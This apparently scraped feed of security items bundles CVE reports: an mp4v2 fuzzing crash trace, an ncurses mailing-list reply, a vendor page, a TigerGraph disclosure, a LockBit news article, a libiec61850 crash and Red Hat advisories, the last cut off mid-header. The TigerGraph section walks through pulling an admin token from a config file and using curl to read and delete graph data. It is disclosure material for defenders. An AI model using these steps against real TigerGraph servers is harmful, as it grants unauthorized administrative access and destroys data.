mp4v2 v2.0.0 was discovered to contain a heap buffer overflow via the MP4GetVideoProfileLevel function at /src/mp4.cpp.

**Heap-buffer-overflow mp4v2/src/mp4.cpp:519:33 in MP4GetVideoProfileLevel****project address**

https://github.com/enzo1982/mp4v2

**info**

OS：Ubuntu20.04 TLS

Build: cmake . && make

mp4info - MP4v2 2.1.2

**Poc**

https://github.com/z1r00/fuzz\_vuln/blob/main/mp4v2/heap-buffer-overflow/MP4GetVideoProfileLevel/id:000000%2Csig:06%2Csrc:000758%2Ctime:1159607%2Cexecs:323115%2Cop:havoc%2Crep:8

**ASAN Info**

./mp4info id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8

mp4v2/mp4info version 2.1.2
mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8:
ReadAtom: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": atom type �ods is suspect
Read: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": Mandatory descriptor 0x06 missing
ReadAtom: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": invalid atom size, extends outside parent atom - skipping to end of "hinf" "dmax" 8458446 vs 4584
ReadAtom: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": invalid atom size, extends outside parent atom - skipping to end of "stbl" "" 1953728578 vs 9686
ReadAtom: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": atom type  is suspect
ReadChildAtoms: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": In atom stbl missing child atom stsc
ReadAtom: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": invalid atom size, extends outside parent atom - skipping to end of "moov" "�Ѱ>" 4026601461 vs 11495
ReadAtom: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": atom type �Ѱ> is suspect
ReadAtom: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": invalid atom size, extends outside parent atom - skipping to end of "" "miso" 829005910 vs 11597
MP4Track: invalid track (/home/z1r0/fuzzing/mp4v2/src/mp4track.cpp,239)
FindIntegerProperty: no such property - moov.iods.visualProfileLevelId (/home/z1r0/fuzzing/mp4v2/src/mp4file.cpp,831)
=================================================================
==168994==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000006190 at pc 0x7f0bc7cb947d bp 0x7ffd0e2ca310 sp 0x7ffd0e2ca308
READ of size 4 at 0x602000006190 thread T0
    #0 0x7f0bc7cb947c in MP4GetVideoProfileLevel /home/z1r0/fuzzing/mp4v2/src/mp4.cpp:519:33
    #1 0x7f0bc7d276bc in mp4v2::impl::PrintVideoInfo(void\*, unsigned int) /home/z1r0/fuzzing/mp4v2/src/mp4info.cpp:404:20
    #2 0x7f0bc7d276bc in mp4v2::impl::PrintTrackInfo(void\*, unsigned int) /home/z1r0/fuzzing/mp4v2/src/mp4info.cpp:543:21
    #3 0x7f0bc7d26889 in MP4Info /home/z1r0/fuzzing/mp4v2/src/mp4info.cpp:596:39
    #4 0x7f0bc7d28b82 in MP4FileInfo /home/z1r0/fuzzing/mp4v2/src/mp4info.cpp:627:18
    #5 0x5560e33e3b41 in main /home/z1r0/fuzzing/mp4v2/util/mp4info.cpp:77:22
    #6 0x7f0bc752e082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    #7 0x5560e32b451d in \_start (/home/z1r0/fuzzing/mp4v2/mp4info+0x2151d)

0x602000006191 is located 0 bytes after 1-byte region \[0x602000006190,0x602000006191)
allocated by thread T0 here:
    #0 0x5560e33991a7 in malloc /home/aep/Downloads/llvm-project-llvmorg-17\-init/compiler-rt/lib/asan/asan\_malloc\_linux.cpp:69:3
    #1 0x7f0bc7c1a3c2 in mp4v2::impl::MP4Malloc(unsigned long) /home/z1r0/fuzzing/mp4v2/./src/mp4util.h:63:15
    #2 0x7f0bc7d0c84f in mp4v2::impl::MP4BytesProperty::GetValue(unsigned char\*\*, unsigned int\*, unsigned int) /home/z1r0/fuzzing/mp4v2/src/mp4property.h:479:30
    #3 0x7f0bc7d0c84f in mp4v2::impl::MP4File::GetBytesProperty(char const\*, unsigned char\*\*, unsigned int\*) /home/z1r0/fuzzing/mp4v2/src/mp4file.cpp:1004:37
    #4 0x7f0bc7d0c84f in mp4v2::impl::MP4File::GetTrackBytesProperty(unsigned int, char const\*, unsigned char\*\*, unsigned int\*) /home/z1r0/fuzzing/mp4v2/src/mp4file.cpp:3254:5
    #5 0x7f0bc7d11586 in mp4v2::impl::MP4File::GetTrackESConfiguration(unsigned int, unsigned char\*\*, unsigned int\*) /home/z1r0/fuzzing/mp4v2/src/mp4file.cpp:3668:9

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/z1r0/fuzzing/mp4v2/src/mp4.cpp:519:33 in MP4GetVideoProfileLevel
Shadow bytes around the buggy address:
  0x602000005f00: fa fa 04 fa fa fa 01 fa fa fa fd fd fa fa 04 fa
  0x602000005f80: fa fa 04 fa fa fa 04 fa fa fa fd fa fa fa 00 00
  0x602000006000: fa fa 00 fa fa fa 04 fa fa fa 00 00 fa fa 00 fa
  0x602000006080: fa fa 04 fa fa fa 00 00 fa fa 00 fa fa fa 04 fa
  0x602000006100: fa fa 00 00 fa fa fd fa fa fa 00 00 fa fa 00 00
=>0x602000006180: fa fa\[01\]fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x602000006200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x602000006280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x602000006300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x602000006380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x602000006400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==168994==ABORTING

**Reference**

https://github.com/z1r00/fuzz\_vuln/blob/main/mp4v2/heap-buffer-overflow/MP4GetVideoProfileLevel/readme.md

CVE-2023-29584: Heap-buffer-overflow mp4v2/src/mp4.cpp:519:33 in MP4GetVideoProfileLevel · Issue #30 · enzo1982/mp4v2

ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[<thread-prev\] \[day\] \[month\] \[year\] \[list\]

Date: Thu, 13 Apr 2023 13:33:56 -0500
From: Mark Esler <mark.esler@...onical.com>
To: oss-security@...ts.openwall.com
Subject: Re: ncurses fixes upstream

On 4/12/23 15:40, Jonathan Bar Or (JBO) wrote:

> Hello oss-security,
>
> Our team has worked with the maintainer of the ncurses library (used by several software packages in Linux) to fix several memory corruption vulnerabilities.
> They are now fixed at commit 20230408 - see details here (https://invisible-island.net/ncurses/NEWS.html#index-t20230408)
> A CVE was assigned (CVE-2023-29491) - it's still under a "reserved" status.
>
> How can we ensure those fixes get deployed upstream, in major Linux distributions?

(distros maintain "downstream" versions of the ncurses "upstream")

Ideally, a security patch should only include security relevant changes. 
If a bunch of a documentation or miscellaneous changes are added, it 
makes backporting difficult (i.e., the non-security relevant changes may 
not be desired or cause the patch to not apply cleanly to old versions 
of ncurses). The upstream patch is already made, but that's what I'd 
recommend for future patches. If there's a regression as Alice suggests, 
that might be a good opportunity to redo the patch format.

http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56

When you publish the CVE json5, you can references the patch URL and 
relevant bug discussions to help downstream. Including the CVE number in 
the patch commit is also quite helpful.

Thank you!

> We've reached out to Arch, RedHat, Canonical and other popular distros independently.
Which email did you contact Canonical with? I cannot find anything 
recent for ncurses on security@...ntu.com
>
> Thanks!
>                               JBO
>
>

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-29491: security - Re: ncurses fixes upstream

Diasoft File Replication Pro 7.5.0 allows attackers to escalate privileges by replacing a legitimate file with a Trojan horse that will be executed as LocalSystem. This occurs because %ProgramFiles%\FileReplicationPro allows Everyone:(F) access.

**Current Version  7.5.0**  

Requires new license keys - Contact Support Before Upgrading

**Click here to** **See a video of the features and installation process**

 **Notice:** This upgrade will require new license keys.  You must have a current support and upgrade assurance contract on every licensed machine to upgrade.  Should you attempt to upgrade without a current support contract, it will result in a non working installation!  Be warned that you will not be able to rollback to your old version after attempting an upgrade if you are off contract.   **Contact Support** to check your status or to update your contracts.

File Replication Pro (FRP) has been delivering advanced file replication & synchronization technology to customers worldwide for over 20 years. File Replication Pro provides a reliable, super fast, and cost effective solution to the file sharing and availability needs of companies and organizations of all sizes?including international networks. **See all Features**

Robust features include advanced job scheduling, file delta identification, real time O/S hooks, bit level comparison, web GUI administration, bandwidth throttling and native cross platform support (Windows, Linux, Mac OSX).

**Out of hundreds of FRP customers, here is a collection of business use cases:**

*   Architectural designs **company** syncs its work between offices across the USA
*   FRP makes Cross Platform disaster recovery possible for Australian provider
*   Global translation service uses FRP to replicate files between offices

**More Business Use Cases**

CVE-2023-26918: File Replication Pro- RealTime, Secure, Offsite Backup & File Sync

An issue was discovered in TigerGraph Enterprise Free Edition 3.x. It creates an authentication token for internal systems use. This token can be read from the configuration file. Using this token on the REST API provides an attacker with anonymous admin-level privileges on all REST API endpoints.

The TigerGraph platform provides users with a REST API that allows authenticated users the ability to load data into the database, query the database, and update the database.

This report highlights that an authentication token – that is used internally by the TigerGraph system – can be read from configuration files stored on the TigerGraph platform. And that anyone using this token is granted administrative privileges across all REST API endpoints. Thereby, allowing an attackerto read and write to any graph in the platform.

**Impact**

Severe.

Unauthorized users can exfiltrate or corrupt any data contained within the TigerGraph platform.

**Products/Versions Affected**

*   TigerGraph Enterprise Free Edition 3.7.0 Docker Image
*   TigerGraph Enterprise Free Edition 3.7.0
*   TigerGraph Cloud

We suspect that this vulnerability is present in all existing TigerGraph products (although this is not confirmed).

**Steps to Reproduce****Download and Run TigerGraph**

Using docker download at the latest TigerGraph image and start the server:

**1.) Optional: clean-up old TigerGraph docker images and obtain the latest version:**

docker rm tigergraph
docker pull docker.tigergraph.com/tigergraph:latest

**2.) Download and run the docker image (note: we do not need to attach a volume):**

docker run -d 
-p 14022:22 
-p 9000:9000 
-p 14240:14240 
--name tigergraph 
--ulimit nofile=1000000:1000000 
-t docker.tigergraph.com/tigergraph:latest

**3.) Once the container has started, connect to it via ssh (note: the default password is ‘tigergraph’):**

ssh -p 14022 tigergraph@localhost

**4.) Start all TigerGraph services:**

gadmin start all

**5.) Using GSQL, create a new graph called test and add a node to it:**

 $ gsql
GSQL> CREATE VERTEX Node(PRIMARY\_ID id UINT, value STRING) WITH primary\_id\_as\_attribute="true"
GSQL> CREATE GRAPH test(\*)
GSQL> begin
GSQL> CREATE QUERY ins(UINT id, STRING value) FOR GRAPH test {
GSQL>   INSERT INTO Node VALUES(id, value);
GSQL> }
GSQL> end
GSQL> interpret query ins(1,"hello”)

**6.) Enable RESTPP authentication**

gadmin config set RESTPP.Factory.EnableAuth true
gadmin config apply -y
gadmin restart restpp nginx gui gsql -y

**Obtaining Administrative Credentials**

To demonstrate that the administrative level web credentials are readily obtainable we download them via the AdminPortal. Although, this step assumes that the login credentials of the administrative user are known; a situation that is plausible (see CVE-2022-xxxxx which details how to locate the login credentials of the administrative user within the system logs).

If however, the login credentials are not known, the web credentials can also be exfiltrated from the TigerGraph platform using the technique described in CVE-2022-xxxxx where a user with low-levels of privilege is able to exploit a weakness in GSQL to load data from arbitrary files into the database. We also found that it is possible to exfiltrate these web credentials under normal operating conditions by exploiting GSQL’s UDF facility to read arbitrary files (see CVE-2022-30331).

**Login To The AdminPortal**

The simplest way to obtain the administrative users login credentials is using AdminStudio and to do this follow these steps:

**1.) Open a web-browser and go to http://localhost:14240 where you will be able to login to GraphStudio using the tigergraph user:**

**2.) Click on the “Admin” button on the top-right corner to switch into administrative mode (called the AdminPortal).**

**Downloading Web Credentials via AdminPortal**

Once logged into the AdminPortal follow the following steps to download the TigerGraph configuration file:

1.  On the left-hand side expand the “Others” menu.
2.  Click on “GSQL Output File” to open the file preview pane.
3.  In the “File path” textbox enter the text “/home/tigergraph/tigergraph/data/configs/tg.cfg“.
4.  Click “Preview” to check that the file exists – if it does the first few lines will be displayed.
5.  Finally, click “Download” and the file will be downloaded to your local computer. On our system it was called m1\_tg.cfg.

**Note**: When tested we found that the GUI was unable to download files that were symbolically linked. So if the files that you download in step 5 are corrupted follow the steps in the next sections to find the location of the actual file.

**Symbolic Linking Issue**

Once logged into AdminPortal perform the following steps:

1.  On the left-hand side expand the “Monitor” menu.
2.  Click on “Logs” to open the window that allows you to search through the system logs.
3.  In the “Pattern” textbox enter the text “LinkFilePath“.
4.  Under components de-select all components except “CONTROLLER”.
5.  Click “Search” to perform the search and return any matches.
6.  Finally, click on any match from the controller log file. (The file name starts “/controller” and ends in “.log”). Doing this will take you to the entry in the log file (shown below).

Once inside the log file you need to locate both the LinkFilePath and the SourceFilePath entries for tg.cfg. In the screenshot above we found these values to be:

*   LinkFilePath:"/home/tigergraph/tigergraph/data/configs/tg.cfg"
*   SourceFilePath:"tg.cfg.eyJDb3VudGVyIjoxMTEsIk1ldGFWZXJzaW9uIjoidjEiLCJWZXJzaW9uIjoxNjU1NDk2NDg0NjIwMjIxNjkyfQ=="
*   tg.cfg.eyJDb3VudGVyIjoxMTEsIk1ldGFWZXJzaW9uIjoidjEiLCJWZXJzaW9uIjoxNjU1NDk2NDg0NjIwMjIxNjkyfQ==

Now to construct the absolute file path to the configuration file replace tg.cfg in LinkFilePath to the value specified by SourceFilePath. In our example, this created the following path: /home/tigergraph/tigergraph/data/configs/tg.cfg.eyJDb3VudGVyIjoxMTEsIk1ldGFWZXJzaW9uIjoidjEiLCJWZXJzaW9uIjoxNjU1NDk2NDg0NjIwMjIxNjkyfQ==

To download this file repeats the same process as described in the section Downloading Web Credentials via AdminPortal but instead use the path that we calculated in this section.

**Using The Administrative Web Token Credentials To Obtain Access**

Once the SSH credentials of the administrative user have been obtained they can be used to authenticate with the remote TigerGraph server and obtain shell access as the administrative user without requiring a password.

**1.) Locate the value of the administrative AuthToken in the configuration file that you obtained. This can either be done using the linux command line as shown below (or opening the file in a text editor and using the in-build find functionality):**

cat m1\_tg.cfg | grep AuthToken

"\\"MaxAuthTokenLifeTimeSec\\": 0",
"\\"AuthToken\\": \\"9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe\\"",

**2.) Do a quick sanity test to check that authentication is enabled on the REST API:**

curl -X GET http://127.0.0.1:9000/graph/test/vertices/Node
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":true,"message":"Access Denied because the input token = '' is empty","code":"REST-10016"}%

**3.) Now we are able to send requests to REST APIs using our administrative AuthToken. Below we use it to return a list of vertices from our test graph:**

curl -X GET \\
-H 'Authorization: Bearer 9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe' \\
http://localhost:9000/graph/test/vertices/Node
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":\[{"v\_id":"1","v\_type":"Node","attributes":{"id":1,"value":"hello"}}\]}%

**4.) We can use these REST endpoints to create/read/updated/delete any graph in the system. Below we use the administrative token to delete a vertex and then do a check it was deleted:**

curl -X DELETE \\
-H 'Authorization: Bearer 9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe' \\
http://localhost:9000/graph/test/vertices/V1
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":{"v\_type":"V1","deleted\_vertices":1}}%

curl -X GET \\
-H 'Authorization: Bearer 9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe' \\
http://localhost:9000/graph/test/vertices/V1
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":\[\]}%

CVE-2023-22951: Unsecured Web Credentials

By Waqas
Is it a highly dubious claim by the infamous LockBit 3.0 ransomware gang? It looks like it!
This is a post from HackRead.com Read the original post: LockBit 3.0 Posts Dubious Claims of Breaching Darktrace Cybersecurity Firm

**Darktrace, a leading cybersecurity firm renowned for its AI-powered threat detection and response solutions, has swiftly dismissed LockBit 3.0’s statements.**

LockBit 3.0, a notorious ransomware gang known for its high-profile and some time making up attacks, has claimed to have successfully hacked, prominent Cambridge, United Kingdom-based Darktrace cybersecurity company.

The gang announced the breach on its dark web portal, where they posted images of Darktrace’s CEO Poppy Gustafsson that are already publicly available. Although LockBit 3.0 claims to have published the alleged stolen data, clicking the download links on the gang’s website only redirects users to Darktrace’s official website.

Screenshot from LockBit 3.0’s website (Credit: Hackread.com)

Darktrace, on the other hand, has issued a statement acknowledging the claims made by LockBit 3.0, but denying any breaches or malicious activity.

> **Our security teams have run a full review of our internal systems and can see no evidence of compromise. None of the LockBit social media posts link to any compromised Darktrace data. We will continue to monitor the situation extremely closely, but based on our current investigations we are confident that our systems remain secure and all customer data is fully protected.**
> 
> Darktrace

LockBit 3.0 has a track record of targeting high-profile organizations, such as a SpaceX contractor, and demanding hefty ransoms for the release of encrypted data. Yet, the group has faced allegations of fabricating claims about compromising new victims. For example, in a similar instance last year, LockBit 3.0 claimed to have breached cybersecurity firm Mandiant, which is owned by Google. However, Mandiant swiftly denied and dismissed the gang’s statements.

There has also been confusion regarding whether LockBit 3.0 initially meant Darktrace or DarkTracer, a Singapore-based threat intelligence and OSINT firm, as their victim. However, it is safe to say that neither Darktrace nor DarkTracer has been targeted or impacted by any breach. Read more about this on Twitter.

> The reliability of the RaaS service operated by LockBit ransomware gang seems to have declined. They appear to have become negligent in managing the service, as fake victims and meaningless data have begun to fill the list, which is being left unattended. pic.twitter.com/mfGhH93oYh
> 
> — Fusion Intelligence Center @ DarkTracer (@darktracer\_int) April 12, 2023

****Ransomware, a growing threat****

In recent years, ransomware attacks have become a major cybersecurity challenge, causing significant financial losses and reputational damage to businesses and organizations worldwide.

These attacks often result in data breaches, operational disruptions, and financial extortion, as victims are left with few options other than paying the ransom or facing severe consequences.

As the cybersecurity landscape continues to evolve, organizations must remain vigilant in their efforts to safeguard their systems and data from cyber threats. This includes implementing robust cybersecurity measures, regularly updating and patching systems, and providing comprehensive employee training on cybersecurity best practices.

1.  Hackers infiltrate Western Digital Internal Systems
2.  New Strain of Rorschach Ransomware Hits US Firms
3.  LockBit blames victim for DDoS attack on its website
4.  UK Criminal Records Office Hit by Ransomware Attack
5.  New Cylance Ransomware Targets Linux and Windows

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

LockBit 3.0 Posts Dubious Claims of Breaching Darktrace Cybersecurity Firm

An issue was discovered in TigerGraph Enterprise Free Edition 3.x. Data loading jobs in gsql_server, created by any user with designer permissions, can read sensitive data from arbitrary locations.

CVE-2023-22950: Data Loading Vulnerability

libiec61850 v1.5.1 was discovered to contain a segmentation violation via the function ControlObjectClient_setOrigin() at /client/client_control.c.

Hi, team  
There is a SEGV in function ControlObjectClient_setOrigin in src/iec61850/client/client_control.c:328 when called from libiec61850/examples/iec61850\_client\_example\_control/client\_example\_control.c:60.

Steps to reproduce:  
I used **gcc 9.4 and AddressSanitizer**(export CFLAGS="-g -fsanitize=address" CXXFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address"before make examples) to build **libiec61850**.  
First, I run the server_example_simple in directory libiec61850/examples/server_example_simple by command sudo ./server_example_simple so that the server is set up.  
Then I tested client_example_control in directory libiec61850/examples/iec61850_client_example_control by command sudo ./client_example_control.  
But I got SEGV in function ControlObjectClient_setOrigin in src/iec61850/client/client_control.c:328.

    $ sudo ./client_example_control
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==12824==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000078 (pc 0x5638e2e178dc bp 0x7ffe9101eb20 sp 0x7ffe9101eb00 T0)
    ==12824==The signal is caused by a READ memory access.
    ==12824==Hint: address points to the zero page.
        #0 0x5638e2e178db in ControlObjectClient_setOrigin src/iec61850/client/client_control.c:328
        #1 0x5638e2e06190 in main /home/saltf1sh/target/libiec61850/examples/iec61850_client_example_control/client_example_control.c:60
        #2 0x7fc4901b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
        #3 0x5638e2e05dbd in _start (/home/saltf1sh/target/libiec61850/examples/iec61850_client_example_control/client_example_control+0x26dbd)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV src/iec61850/client/client_control.c:328 in ControlObjectClient_setOrigin
    ==12824==ABORTING

CVE-2023-27772: SEGV in function ControlObjectClient_setOrigin() · Issue #442 · mz-automation/libiec61850

Red Hat Security Advisory 2023-1765-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: openvswitch2.17 security update  
Advisory ID:       RHSA-2023:1765-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1765  
Issue date:        2023-04-13  
CVE Names:         CVE-2023-1668  
====================================================================  
1. Summary:

An update for openvswitch2.17 is now available in Fast Datapath for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 8 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* openvswitch: ip proto 0 triggers incorrect handling (CVE-2023-1668)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [23.C RHEL-8] Fast Datapath Release (BZ#2177685)

* [CT] Inner header of ICMP related traffic does not get DNATed  
(BZ#2178200)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2137666 - CVE-2023-1668 openvswitch: ip proto 0 triggers incorrect handling  
2177685 - [23.C RHEL-8] Fast Datapath Release  
2178200 - [CT] Inner header of ICMP related traffic does not get DNATed

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 8:

Source:  
openvswitch2.17-2.17.0-88.el8fdp.src.rpm

aarch64:  
network-scripts-openvswitch2.17-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-debuginfo-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-debugsource-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-devel-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-ipsec-2.17.0-88.el8fdp.aarch64.rpm  
python3-openvswitch2.17-2.17.0-88.el8fdp.aarch64.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-88.el8fdp.aarch64.rpm

noarch:  
openvswitch2.17-test-2.17.0-88.el8fdp.noarch.rpm

ppc64le:  
network-scripts-openvswitch2.17-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-debuginfo-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-debugsource-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-devel-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-ipsec-2.17.0-88.el8fdp.ppc64le.rpm  
python3-openvswitch2.17-2.17.0-88.el8fdp.ppc64le.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-88.el8fdp.ppc64le.rpm

s390x:  
network-scripts-openvswitch2.17-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-debuginfo-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-debugsource-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-devel-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-ipsec-2.17.0-88.el8fdp.s390x.rpm  
python3-openvswitch2.17-2.17.0-88.el8fdp.s390x.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-88.el8fdp.s390x.rpm

x86_64:  
network-scripts-openvswitch2.17-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-debuginfo-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-debugsource-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-devel-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-ipsec-2.17.0-88.el8fdp.x86_64.rpm  
python3-openvswitch2.17-2.17.0-88.el8fdp.x86_64.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-88.el8fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1668  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDfaINzjgjWX9erEAQiMWg//d9j3aPfYak2tV8EI9xSItFv6WpoLCB4y  
rC4956fWN4hzmKSYHnrw4uvhEVPf1hsue5zJIO0VHlT5MqmwDn6wDjP//V8GC4lE  
JUmTZHQMcWlt/dZQm2mh2I0n4oR0y/4gY3f4kKXUPM0Mg1S1MAEahmm4S9NWAGF7  
f2nVf1b1PACs3E4QfStldiawDDmwPCe8zsaaCCVL9sIR/KZI6yoZOJu8RjCWHac6  
0kw6LpIDjOwoJ/tc2JMoP/1JORzA+6S0Lrg+ZI8Kd0qwL/6KOcBpgCYXYD1eyp60  
18At7rFMonFlOW2JG8A0ewe6MZDXoyJsWjNZl2xPXsa1tHT/jnK29EbXr14X40kx  
/fpSdiRr1zSfChCPFVedxaBWY9L2UoAUGx6TnGXNuNC1UTM0pseMfUMy7TAC4ZV4  
o6qH7hC4a2W1tOxndAq8MWGeh49pq1n/EjwF+deKU73ke834pwDfQFRO03YB4jjM  
myicYpRKimbd6TzFhunIaKJcEYGX5Jna6nBd50a2b5mfHOS/FKah2fmROTK8bRv8  
202/9CCCGWSzE3IlUT9JcamNcdre0xZHmkYXpyLTuW0keXp+wlb19aVR42ZtRq6L  
U+TiznvhSU3XuH7KxJJS0AQdi+zyBWSR24ADbE70nQfu0nP6hupQBo6Eg2dnhdva  
w5iYSsJ1/AA=J+dO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1765-01

Red Hat Security Advisory 2023-1769-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: openvswitch2.17 security update  
Advisory ID:       RHSA-2023:1769-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1769  
